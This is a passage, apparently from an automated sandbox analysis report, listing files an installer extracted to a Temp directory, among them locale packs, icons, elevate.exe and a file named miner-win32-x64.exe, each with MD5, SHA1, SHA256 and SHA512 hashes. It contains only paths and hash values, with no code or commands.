SHA1 1785d3293595f0b13648fb28aec6936c48ea3111
SHA256 4df972b7f6d81aa7bdc39e2441310a37f746ae5015146b4e434a878d1244375b
SHA512 8b1a4d487b0782055717b718d58cd21e815b874e2686cdfd2087876b70ae75f9182f783c70bf747cf4ca17a3afc68517a9db4c99449fa09bef658b5e68087f2a

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\hi.pak

MD5 b5dfce8e3ba0aec2721cc1692b0ad698
SHA1 c5d6fa21a9ba3d526f3e998e3f627afb8d1eecf3
SHA256 b1c7fb6909c8a416b513d6de21eea0b5a6b13c7f0a94cabd0d9154b5834a5e8b
SHA512 facf0a9b81af6bb35d0fc5e69809d5c986a2c91a166e507784bdad115644b96697fe504b8d70d9bbb06f0c558f746c085d37e385eef41f0a1c29729d3d97980f

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\he.pak

MD5 fc84ea7dc7b9408d1eea11beeb72b296
SHA1 de9118194952c2d9f614f8e0868fb273ddfac255
SHA256 15951767dafa7bdbedac803d842686820de9c6df478416f34c476209b19d2d8c
SHA512 49d13976dddb6a58c6fdcd9588e243d705d99dc1325c1d9e411a1d68d8ee47314dfcb661d36e2c4963c249a1542f95715f658427810afcabdf9253aa27eb3b24

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\gu.pak

MD5 308619d65b677d99f48b74ccfe060567
SHA1 9f834df93fd48f4fb4ca30c4058e23288cf7d35e
SHA256 e40ee4f24839f9e20b48d057bf3216bc58542c2e27cb40b9d2f3f8a1ea5bfbb4
SHA512 3ca84ad71f00b9f7cc61f3906c51b263f18453fce11ec6c7f9edfe2c7d215e3550c336e892bd240a68a6815af599cc20d60203294f14adb133145ca01fe4608f

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\fr.pak

MD5 3ee48a860ecf45bafa63c9284dfd63e2
SHA1 1cb51d14964f4dced8dea883bf9c4b84a78f8eb6
SHA256 1923e0edf1ef6935a4a718e3e2fc9a0a541ea0b4f3b27553802308f9fd4fc807
SHA512 eb6105faca13c191fef0c51c651a406b1da66326bb5705615770135d834e58dee9bed82aa36f2dfb0fe020e695c192c224ec76bb5c21a1c716e5f26dfe02f763

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\et.pak

MD5 ccc71f88984a7788c8d01add2252d019
SHA1 6a87752eac3044792a93599428f31d25debea369
SHA256 d69489a723b304e305cb1767e6c8da5d5d1d237e50f6ddc76e941dcb01684944
SHA512 d35ccd639f2c199862e178a9fab768d7db10d5a654bc3bc1fab45d00ceb35a01119a5b4d199e2db3c3576f512b108f4a1df7faf6624d961c0fc4bca5af5f0e07

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\es.pak

MD5 04a9ba7316dc81766098e238a667de87
SHA1 24d7eb4388ecdfecada59c6a791c754181d114de
SHA256 7fa148369c64bc59c2832d617357879b095357fe970bab9e0042175c9ba7cb03
SHA512 650856b6187df41a50f9bed29681c19b4502de6af8177b47bad0bf12e86a25e92aa728311310c28041a18e4d9f48ef66d5ad5d977b6662c44b49bfd1da84522b

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\en-GB.pak

MD5 825ed4c70c942939ffb94e77a4593903
SHA1 7a3faee9bf4c915b0f116cb90cec961dda770468
SHA256 e11e8db78ae12f8d735632ba9fd078ec66c83529cb1fd86a31ab401f6f833c16
SHA512 41325bec22af2e5ef8e9b26c48f2dfc95763a249ccb00e608b7096ec6236ab9a955de7e2340fd9379d09ac2234aee69aed2a24fe49382ffd48742d72a929c56a

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\el.pak

MD5 e66a75680f21ce281995f37099045714
SHA1 d553e80658ee1eea5b0912db1ecc4e27b0ed4790
SHA256 21d1d273124648a435674c7877a98110d997cf6992469c431fe502bbcc02641f
SHA512 d3757529dd85ef7989d9d4cecf3f7d87c9eb4beda965d8e2c87ee23b8baaec3fdff41fd53ba839215a37404b17b8fe2586b123557f09d201b13c7736c736b096

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\de.pak

MD5 cf22ec11a33be744a61f7de1a1e4514f
SHA1 73e84848c6d9f1a2abe62020eb8c6797e4c49b36
SHA256 7cc213e2c9a2d2e2e463083dd030b86da6bba545d5cee4c04df8f80f9a01a641
SHA512 c10c8446e3041d7c0195da184a53cfbd58288c06eaf8885546d2d188b59667c270d647fa7259f5ce140ec6400031a7fc060d0f2348ab627485e2207569154495

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\da.pak

MD5 e7ba94c827c2b04e925a76cb5bdd262c
SHA1 abba6c7fcec8b6c396a6374331993c8502c80f91
SHA256 d8da7ab28992c8299484bc116641e19b448c20adf6a8b187383e2dba5cd29a0b
SHA512 1f44fce789cf41fd62f4d387b7b8c9d80f1e391edd2c8c901714dd0a6e3af32266e9d3c915c15ad47c95ece4c7d627aa7339f33eea838d1af9901e48edb0187e

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\cs.pak

MD5 eeee212072ea6589660c9eb216855318
SHA1 d50f9e6ca528725ced8ac186072174b99b48ea05
SHA256 de92f14480770401e39e22dcf3dd36de5ad3ed22e44584c31c37cd99e71c4a43
SHA512 ea068186a2e611fb98b9580f2c5ba6fd1f31b532e021ef9669e068150c27deee3d60fd9ff7567b9eb5d0f98926b24defabc9b64675b49e02a6f10e71bb714ac8

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\ca.pak

MD5 4cd6b3a91669ddcfcc9eef9b679ab65c
SHA1 43c41cb00067de68d24f72e0f5c77d3b50b71f83
SHA256 56efff228ee3e112357d6121b2256a2c3acd718769c89413de82c9d4305459c6
SHA512 699be9962d8aae241abd1d1f35cd8468ffbd6157bcd6bdf2c599d902768351b247baad6145b9826d87271fd4a19744eb11bf7065db7fefb01d66d2f1f39015a9

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\bn.pak

MD5 9340520696e7cb3c2495a78893e50add
SHA1 eed5aeef46131e4c70cd578177c527b656d08586
SHA256 1ea245646a4b4386606f03c8a3916a3607e2adbbc88f000976be36db410a1e39
SHA512 62507685d5542cfcd394080917b3a92ca197112feea9c2ddc1dfc77382a174c7ddf758d85af66cd322692215cb0402865b2a2b212694a36da6b592028caafcdf

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\bg.pak

MD5 38bcabb6a0072b3a5f8b86b693eb545d
SHA1 d36c8549fe0f69d05ffdaffa427d3ddf68dd6d89
SHA256 898621731ac3471a41f8b3a7bf52e7f776e8928652b37154bc7c1299f1fd92e1
SHA512 002adbdc17b6013becc4909daf2febb74ce88733c78e968938b792a52c9c5a62834617f606e4cb3774ae2dad9758d2b8678d7764bb6dcfe468881f1107db13ef

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\ar.pak

MD5 fdbad4c84ac66ee78a5c8dd16d259c43
SHA1 3ce3cd751bb947b19d004bd6916b67e8db5017ac
SHA256 a62b848a002474a8ea37891e148cbaf4af09bdba7dafebdc0770c9a9651f7e3b
SHA512 376519c5c2e42d21acedb1ef47184691a2f286332451d5b8d6aac45713861f07c852fb93bd9470ff5ee017d6004aba097020580f1ba253a5295ac1851f281e13

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\am.pak

MD5 2c933f084d960f8094e24bee73fa826c
SHA1 91dfddc2cff764275872149d454a8397a1a20ab1
SHA256 fa1e44215bd5acc7342c431a3b1fddb6e8b6b02220b4599167f7d77a29f54450
SHA512 3c9ecfb0407de2aa6585f4865ad54eeb2ec6519c9d346e2d33ed0e30be6cc3ebfed676a08637d42c2ca8fa6cfefb4091feb0c922ff71f09a2b89cdd488789774

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\af.pak

MD5 464e5eeaba5eff8bc93995ba2cb2d73f
SHA1 3b216e0c5246c874ad0ad7d3e1636384dad2255d
SHA256 0ad547bb1dc57907adeb02e1be3017cce78f6e60b8b39395fe0e8b62285797a1
SHA512 726d6c41a9dbf1f5f2eff5b503ab68d879b088b801832c13fba7eb853302b16118cacda4748a4144af0f396074449245a42b2fe240429b1afcb7197fa0cb6d41

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\pt-PT.pak

MD5 b4954b064e3f6a9ba546dda5fa625927
SHA1 584686c6026518932991f7de611e2266d8523f9d
SHA256 ee1e014550b85e3d18fb5128984a713d9f6de2258001b50ddd18391e7307b4a1
SHA512 cb3b465b311f83b972eca1c66862b2c5d6ea6ac15282e0094aea455123ddf32e85df24a94a0aedbe1b925ff3ed005ba1e00d5ee820676d7a5a366153ade90ef7

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\zh-TW.pak

MD5 2456bf42275f15e016689da166df9008
SHA1 70f7de47e585dfea3f5597b5bba1f436510decd7
SHA256 adf8df051b55507e5a79fa47ae88c7f38707d02dfac0cc4a3a7e8e17b58c6479
SHA512 7e622afa15c70785aaf7c19604d281efe0984f621d6599058c97c19d3c0379b2ee2e03b3a7ec597040a4eee250a782d7ec55c335274dd7db7c7ca97ddcfd378a

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\resources\elevate.exe

MD5 2653bad507b132584745b3449e6c7a55
SHA1 def2f0942150b45bdf49ce6ccfb0cc28ae00ba03
SHA256 f4e258dd50e8606b72cea9a8ae5461936ee2e1453ab0b32a5621e0d2c969aef3
SHA512 d3d2fbcaa8eda8324d13c9f99d4d691a9ebd418785abb78dcf2daaebd65b8fcb09ebd0d8e6540cdb83b2446e0dc5214b6c3812350e9180628229933f3718a4b4

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\zh-CN.pak

MD5 82326e465e3015c64ca1db77dc6a56bc
SHA1 e8abe12a8dd2cc741b9637fa8f0e646043bbfe3d
SHA256 6655fd9dcdfaf2abf814ffb6c524d67495aed4d923a69924c65abeab30bc74fb
SHA512 4989789c0b2439666dda4c4f959dffc0ddcb77595b1f817c13a95ed97619c270151597160320b3f2327a7daffc8b521b68878f9e5e5fb3870eb0c43619060407

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\vi.pak

MD5 db0eb3183007de5aae10f934fffacc59
SHA1 e9ea7aeffe2b3f5cf75ab78630da342c6f8b7fd9
SHA256 ddabb225b671b989789e9c2ccd1b5a8f22141a7d9364d4e6ee9b8648305e7897
SHA512 703efd12fcace8172c873006161712de1919572c58d98b11de7834c5628444229f5143d231c41da5b9cf729e32de58dee3603cb3d18c6cdd94aa9aa36fbf5de0

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\ur.pak

MD5 1ca4fa13bd0089d65da7cd2376feb4c6
SHA1 b1ba777e635d78d1e98e43e82d0f7a3dd7e97f9c
SHA256 3941364d0278e2c4d686faa4a135d16a457b4bc98c5a08e62aa12f3adc09aa7f
SHA512 d0d9eb1aa029bd4c34953ee5f4b60c09cf1d4f0b21c061db4ede1b5ec65d7a07fc2f780ade5ce51f2f781d272ac32257b95eedf471f7295ba70b5ba51db6c51d

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\uk.pak

MD5 361a0e1f665b9082a457d36209b92a25
SHA1 3c89e1b70b51820bb6baa64365c64da6a9898e2f
SHA256 bd02966f6c6258b66eae7ff014710925e53fe26e8254d7db4e9147266025cc3a
SHA512 d4d25fc58053f8cce4c073846706dc1ecbc0dc19308ba35501e19676f3e7ed855d7b57ae22a5637f81cefc1aa032bf8770d0737df1924f3504813349387c08cf

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\tr.pak

MD5 5ff2e5c95067a339e3d6b8985156ec1f
SHA1 7525b25c7b07f54b63b6459a0d8c8c720bd8a398
SHA256 14a131ba318274cf10de533a19776db288f08a294cf7e564b7769fd41c7f2582
SHA512 2414386df8d7ab75dcbd6ca2b9ae62ba8e953ddb8cd8661a9f984eb5e573637740c7a79050b2b303af3d5b1d4d1bb21dc658283638718fdd04fc6e5891949d1b

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\th.pak

MD5 a32ba63feeed9b91f6d6800b51e5aeae
SHA1 2fbf6783996e8315a4fb94b7d859564350ee5918
SHA256 e32e37ca0ab30f1816fe6df37e3168e1022f1d3737c94f5472ab6600d97a45f6
SHA512 adebde0f929820d8368096a9c30961ba7b33815b0f124ca56ca05767ba6d081adf964088cb2b9fcaa07f756b946fffa701f0b64b07d457c99fd2b498cbd1e8a5

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\te.pak

MD5 a17f16d7a038b0fa3a87d7b1b8095766
SHA1 b2f845e52b32c513e6565248f91901ab6874e117
SHA256 d39716633228a5872630522306f89af8585f8092779892087c3f1230d21a489e
SHA512 371fb44b20b8aba00c4d6f17701fa4303181ad628f60c7b4218e33be7026f118f619d66d679bffcb0213c48700fafd36b2e704499a362f715f63ea9a75d719e7

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\ta.pak

MD5 18ec8ff3c0701a6a8c48f341d368bab5
SHA1 8bff8aee26b990cf739a29f83efdf883817e59d8
SHA256 052bcdb64a80e504bb6552b97881526795b64e0ab7ee5fc031f3edf87160dee9
SHA512 a0e997fc9d316277de3f4773388835c287ab1a35770c01e376fb7428ff87683a425f6a6a605d38dd7904ca39c50998cd85f855cb33ae6abad47ac85a1584fe4e

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\sw.pak

MD5 67a443a5c2eaad32625edb5f8deb7852
SHA1 a6137841e8e7736c5ede1d0dc0ce3a44dc41013f
SHA256 41dfb772ae4c6f9e879bf7b4fa776b2877a2f8740fa747031b3d6f57f34d81dd
SHA512 e0fdff1c3c834d8af8634f43c2f16ba5b883a8d88dfd322593a13830047568faf9f41d0bf73cd59e2e33c38fa58998d4702d2b0c21666717a86945d18b3f29e5

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\sv.pak

MD5 272f8a8b517c7283eab83ba6993eea63
SHA1 ad4175331b948bd4f1f323a4938863472d9b700c
SHA256 d15b46bc9b5e31449b11251df19cd2ba4920c759bd6d4fa8ca93fd3361fdd968
SHA512 3a0930b7f228a779f727ebfb6ae8820ab5cc2c9e04c986bce7b0f49f9bf124f349248ecdf108edf8870f96b06d58dea93a3e0e2f2da90537632f2109e1aa65f0

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\sr.pak

MD5 c68c235d8e696c098cf66191e648196b
SHA1 5c967fbbd90403a755d6c4b2411e359884dc8317
SHA256 ab96a18177af90495e2e3c96292638a775aa75c1d210ca6a6c18fbc284cd815b
SHA512 34d14d8cb851df1ea8cd3cc7e9690eaf965d8941cfcac1c946606115ad889630156c5ff47011b27c1288f8df70e8a7dc41909a9fa98d75b691742ec1d1a5e653

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\sl.pak

MD5 ca763e801de642e4d68510900ff6fabb
SHA1 c32a871831ce486514f621b3ab09387548ee1cff
SHA256 340e0babe5fddbfda601c747127251cf111dd7d79d0d6a5ec4e8443b835027de
SHA512 e2847ce75de57deb05528dd9557047edcd15d86bf40a911eb97e988a8fdbda1cd0e0a81320eadf510c91c826499a897c770c007de936927df7a1cc82fa262039

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\sk.pak

MD5 b7e97cc98b104053e5f1d6a671c703b7
SHA1 0f7293f1744ae2cd858eb3431ee016641478ae7d
SHA256 b0d38869275d9d295e42b0b90d0177e0ca56a393874e4bb454439b8ce25d686f
SHA512 ef3247c6f0f4065a4b68db6bf7e28c8101a9c6c791b3f771ed67b5b70f2c9689cec67a1c864f423382c076e4cbb6019c1c0cb9ad0204454e28f749a69b6b0de0

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\ro.pak

MD5 d2758f6adbaeea7cd5d95f4ad6dde954
SHA1 d7476db23d8b0e11bbabf6a59fde7609586bdc8a
SHA256 2b7906f33bfbe8e9968bcd65366e2e996cdf2f3e1a1fc56ad54baf261c66954c
SHA512 8378032d6febea8b5047ada667cb19e6a41f890cb36305acc2500662b4377caef3dc50987c925e05f21c12e32c3920188a58ee59d687266d70b8bfb1b0169a6e

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\pt-BR.pak

MD5 8e931ffbded8933891fb27d2cca7f37d
SHA1 ab0a49b86079d3e0eb9b684ca36eb98d1d1fd473
SHA256 6632bd12f04a5385012b5cdebe8c0dad4a06750dc91c974264d8fe60e8b6951d
SHA512 cf0f6485a65c13cf5ddd6457d34cdea222708b0bb5ca57034ed2c4900fd22765385547af2e2391e78f02dcf00b7a2b3ac42a3509dd4237581cfb87b8f389e48d

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\pl.pak

MD5 f1d48a7dcd4880a27e39b7561b6eb0ab
SHA1 353c3ba213cd2e1f7423c6ba857a8d8be40d8302
SHA256 2593c8b59849fbc690cbd513f06685ea3292cd0187fcf6b9069cbf3c9b0e8a85
SHA512 132da2d3c1a4dad5ccb399b107d7b6d9203a4b264ef8a65add11c5e8c75859115443e1c65ece2e690c046a82687829f54ec855f99d4843f859ab1dd7c71f35a5

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\nl.pak

MD5 0f04bac280035fab018f634bcb5f53ae
SHA1 4cad76eaecd924b12013e98c3a0e99b192be8936
SHA256 be254bcda4dbe167cb2e57402a4a0a814d591807c675302d2ce286013b40799b
SHA512 1256a6acac5a42621cb59eb3da42ddeeacfe290f6ae4a92d00ebd4450a8b7ccb6f0cd5c21cf0f18fe4d43d0d7aee87b6991fef154908792930295a3871fa53df

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\nb.pak

MD5 55d5ad4eacb12824cfcd89470664c856
SHA1 f893c00d8d4fdb2f3e7a74a8be823e5e8f0cd673
SHA256 4f44789a2c38edc396a31aba5cc09d20fb84cd1e06f70c49f0664289c33cd261
SHA512 555d87be8c97f466c6b3e7b23ec0210335846398c33dba71e926ff7e26901a3908dbb0f639c93db2d090c9d8bda48eddf196b1a09794d0e396b2c02b4720f37e

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\ms.pak

MD5 aee105366a1870b9d10f0f897e9295db
SHA1 eee9d789a8eeafe593ce77a7c554f92a26a2296f
SHA256 c6471aee5f34f31477d57f593b09cb1de87f5fd0f9b5e63d8bab4986cf10d939
SHA512 240688a0054bfebe36ea2b056194ee07e87bbbeb7e385131c73a64aa7967984610fcb80638dd883837014f9bc920037069d0655e3e92a5922f76813aedb185fa

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\mr.pak

MD5 2cf9f07ddf7a3a70a48e8b524a5aed43
SHA1 974c1a01f651092f78d2d20553c3462267ddf4e9
SHA256 23058c0f71d9e40f927775d980524d866f70322e0ef215aa5748c239707451e7
SHA512 0b21570deefa41defc3c25c57b3171635bcb5593761d48a8116888ce8be34c1499ff79c7a3ebbe13b5a565c90027d294c6835e92e6254d582a86750640fe90f2

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\resources\app-update.yml

MD5 4401cfaa2573080bbb40a0792f74af2d
SHA1 d9cc23feba74953be072b8853b75072e04cf3533
SHA256 289c20ad6e8d4675bb172f4208821a95dac0346f1d8010847534343c4b005dbb
SHA512 5571e36b54b26821fef8db043bc3c9dfe1ba9c7f76701ab7c405acf05e299b928a7a2a68cb46cffa173eb599a15c621483af6bbdca0cb332dc013888d151b370

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\ru.pak

MD5 2885bde990ee3b30f2c54a4067421b68
SHA1 ae16c4d534b120fdd68d33c091a0ec89fd58793f
SHA256 9fcda0d1fab7fff7e2f27980de8d94ff31e14287f58bd5d35929de5dd9cbcdca
SHA512 f7781f5c07fbf128399b88245f35055964ff0cde1cc6b35563abc64f520971ce9916827097ca18855b46ec6397639f5416a6e8386a9390afba4332d47d21693f

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\ml.pak

MD5 1c81104ac2cbf7f7739af62eb77d20d5
SHA1 0f0d564f1860302f171356ea35b3a6306c051c10
SHA256 66005bc01175a4f6560d1e9768dbc72b46a4198f8e435250c8ebc232d2dac108
SHA512 969294eae8c95a1126803a35b8d3f1fc3c9d22350aa9cc76b2323b77ad7e84395d6d83b89deb64565783405d6f7eae40def7bdaf0d08da67845ae9c7dbb26926

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\lv.pak

MD5 a8cbd741a764f40b16afea275f240e7e
SHA1 317d30bbad8fd0c30de383998ea5be4eec0bb246
SHA256 a1a9d84fd3af571a57be8b1a9189d40b836808998e00ec9bd15557b83d0e3086
SHA512 3da91c0ca20165445a2d283db7dc749fcf73e049bfff346b1d79b03391aefc7f1310d3ac2c42109044cfb50afcf178dcf3a34b4823626228e591f328dd7afe95

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\lt.pak

MD5 64b08ffc40a605fe74ecc24c3024ee3b
SHA1 516296e8a3114ddbf77601a11faf4326a47975ab
SHA256 8a5d6e29833374e0f74fd7070c1b20856cb6b42ed30d18a5f17e6c2e4a8d783e
SHA512 05d207413186ac2b87a59681efe4fdf9dc600d0f3e8327e7b9802a42306d80d0ddd9ee07d103b17caf0518e42ab25b7ca9da4713941abc7bced65961671164ac

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\ko.pak

MD5 d6194fc52e962534b360558061de2a25
SHA1 98ed833f8c4beac685e55317c452249579610ff8
SHA256 1a5884bd6665b2f404b7328de013522ee7c41130e57a53038fc991ec38290d21
SHA512 5207a07426c6ceb78f0504613b6d2b8dadf9f31378e67a61091f16d72287adbc7768d1b7f2a923369197e732426d15a872c091cf88680686581d48a7f94988ab

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\kn.pak

MD5 caab4deb1c40507848f9610d849834cf
SHA1 1bc87ff70817ba1e1fdd1b5cb961213418680cbe
SHA256 7a34483e6272f9b8881f0f5a725b477540166561c75b9e7ab627815d4be1a8a4
SHA512 dc4b63e5a037479bb831b0771aec0fe6eb016723bcd920b41ab87ef11505626632877073ce4e5e0755510fe19ba134a7b5899332ecef854008b15639f915860c

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\resources\resources\icons\[email protected]

MD5 025a665417df36e46c663dabced475f9
SHA1 255b2629c7b2d6bf5248ae6a3d65a8e038219731
SHA256 8adc1a1004d1a197a4f4d810a65e5d4d339797609381f734f1431a640c754fc5
SHA512 4ac05d9a891589d88ea595fb8d0220cd1ea415ca4d97710344474e5654d68a9ef1a699bf775b3164cf9f93366f420c6cf82e5ea060f1898fc97035cf58c5c606

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\resources\resources\icons\[email protected]

MD5 72cc33374680fb4599ee2ba30aa6d4f6
SHA1 1fb7a83d4814209c1f3226b1d09841170b06c8e6
SHA256 ada29f069ea1c6bb2cef5dc0bb3295677ed440fd256480313c901264710ce7f0
SHA512 d2e3b92c4b0a390f542936cd67f0e497638074a4eea0052608d314f28861da9d0ce1f512eb4ba02a9e201e52738efbbe9c24462a02b725b31d2517dabe5cda41

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\resources\resources\icons\icon_16x16.png

MD5 9bc293876800bf1e564f4b4e927ced86
SHA1 1b92b171f9c9b28db96d47d7114a86a9903e76f0
SHA256 f3c7035b001a890e69ce07ba21479c03bafd60ac2ec4aa5635115e000176ea99
SHA512 234280bfee1c81ecb1bc526bfdc6c8bb36be01ef35e8901bd4adc46c2bb0bf201264f92ca8de65b557276bbae8f411126b427e3dc634a2d2daba8ad1c59dfd78

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\resources\resources\icons\[email protected]

MD5 e8a78b1d8becfd9390e5b8f767b2dbf6
SHA1 0d0cd3c9a184641bf741f95c7303d8bcbbba8a87
SHA256 fdd7544ee93815f2e4d9ceb52c0515bfcec9da066a010e10bd38ada92c4611d5
SHA512 7f514d2d0782bb58063c126c440901f35f38de02a957bd03119cb7ebbf236345700d9b5d9fb3c47612565c07e6444107dd9cc24d0749c426ce9a0f9a6307bd6d

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\resources\resources\icons\icon_128x128.png

MD5 74dbe88add0b751362a8b3d506dd7ccc
SHA1 ce288f2acf631ce4079dbb082585e6a203979561
SHA256 a98fca1bf4b4eef44348a5399cfa777142442211dd12046407dbcc51bfdb036f
SHA512 d9c67f57f533c0b38a9e2da297725309a1e5081a84258c57acb917928dedb5a0cd20e0468cedcb69797d29c59f7f617773c4a78c340e3a7bb05601db36ecd057

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\resources\resources\miner-win32-x64.exe

MD5 424dd12730841a3505baec6d246c8709
SHA1 3a6bda785e1e3790877483a2c49b182dc94bb0a2
SHA256 435cff4d1c558b1fe6e2ffbb17cf26b22f12b84a5fa3c919a9866688654d63e4
SHA512 35965f00974ef043eb451f1fc4dd1ae5c08b67bfddaf738bd02cc12e9c21a298b54431109e5cb4003d26889fd5a313b47cdceb81efd5d90c5f31bb25350ad5eb

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\ja.pak

MD5 38cd3ef9b7dff9efbbe086fa39541333
SHA1 321ef69a298d2f9830c14140b0b3b0b50bd95cb0
SHA256 d8fab5714dafecb89b3e5fce4c4d75d2b72893e685e148e9b60f7c096e5b3337
SHA512 40785871032b222a758f29e0c6ec696fbe0f6f5f3274cc80085961621bec68d7e0fb47c764649c4dd0c27c6ee02460407775fae9d3a2a8a59362d25a39266ce0

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\it.pak

MD5 745f16ca860ee751f70517c299c4ab0e
SHA1 54d933ad839c961dd63a47c92a5b935eef208119
SHA256 10e65f42ce01ba19ebf4b074e8b2456213234482eadf443dfad6105faf6cde4c
SHA512 238343d6c80b82ae900f5abf4347e542c9ea016d75fb787b93e41e3c9c471ab33f6b4584387e5ee76950424e25486dd74b9901e7f72876960c0916c8b9cee9a6

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\locales\id.pak

MD5 b6fcd5160a3a1ae1f65b0540347a13f2
SHA1 4cf37346318efb67908bba7380dbad30229c4d3d
SHA256 7fd715914e3b0cf2048d4429f3236e0660d5bd5e61623c8fef9b8e474c2ac313
SHA512 a8b4a96e8f9a528b2df3bd1251b72ab14feccf491dd254a7c6ecba831dfaba328adb0fd0b4acddb89584f58f94b123e97caa420f9d7b34131cc51bdbdbf3ed73

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\resources\resources\icons\[email protected]

MD5 49997cc64cace4b1a6e5ebf870ff0485
SHA1 1b7f26f19b27a0d69ce3e59c29ab9d04b4401bb9
SHA256 2ac2ef1674dccdad0647ed7bdb09a98cce01685098a00c9413e05740d56204bf
SHA512 70c06f85061dbf2749965f85f9e81003f44702fa2493390ca042a9a2431e51015bdfbf5e46f20fe6e7e5361ebe5e3c907bc1ac5728c4846f89cc8022282ceef6

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\resources\resources\image\status-on.png

MD5 b61125bb67a7ec7118c2c4828c5ba5e0
SHA1 a7d40f41bf895b03f54694a930067adc34022e0a
SHA256 d31fbec37e3b342a1f0b555405f7f1c662cf7cd62aa1c067e09dc954272677ac
SHA512 f07e0b57894ea2a84b5075df50694ade9812fc037679f9608a13f00d05e98641e0a38f2d89212db5606354ae196a483be9c0ccbffbf32ee41af37c926fac328e

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\resources\resources\image\status-off.png

MD5 b312eabf23c02be61a7b4d859c1190fb
SHA1 ec5dc087be6a70ddcff9b1ab1770b03e3c14a3cd
SHA256 d3fe40e21e1900e3af2356fd73ba5b36a3f8484a1120d43a37b50a6c62f43456
SHA512 e0026cb29b08e8af8af2902ff94982a116ca2e6bc7e012d73d5bc4676cafc52a09419e1b498a7fa8f90e77f7ea4475ca39128d4294cf4264bffc4c450e24f568

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\7z-out\resources\resources\icons\[email protected]

MD5 d8f9e26e8240936e665c319697893769
SHA1 3de521cddf8c4be221e4aeedd7115b865c08f4f9
SHA256 cae9e470bb0f06ab1543c0a578699744e5304fd30c24ffd82b937bf423f30dd0
SHA512 850b7d05cc79ecb833156778b29e6a0cbeb1e8235eb9a1b1cf8ef61877af4372c57de2f2dfdb0a7522f0f0fe3247615a96c01beb407fe3dc94f3e2c3b4c514a9

C:\Users\Admin\AppData\Local\Temp\nsfBA48.tmp\WinShell.dll

MD5 1cc7c37b7e0c8cd8bf04b6cc283e1e56
SHA1 0b9519763be6625bd5abce175dcc59c96d100d4c
SHA256 9be85b986ea66a6997dde658abe82b3147ed2a1a3dcb784bb5176f41d22815a6
SHA512 7acf7f8e68aa6066b59ca9f2ae2e67997e6b347bc08eb788d2a119b3295c844b5b9606757168e8d2fbd61c2cda367bf80e9e48c9a52c28d5a7a00464bfd2048f

C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

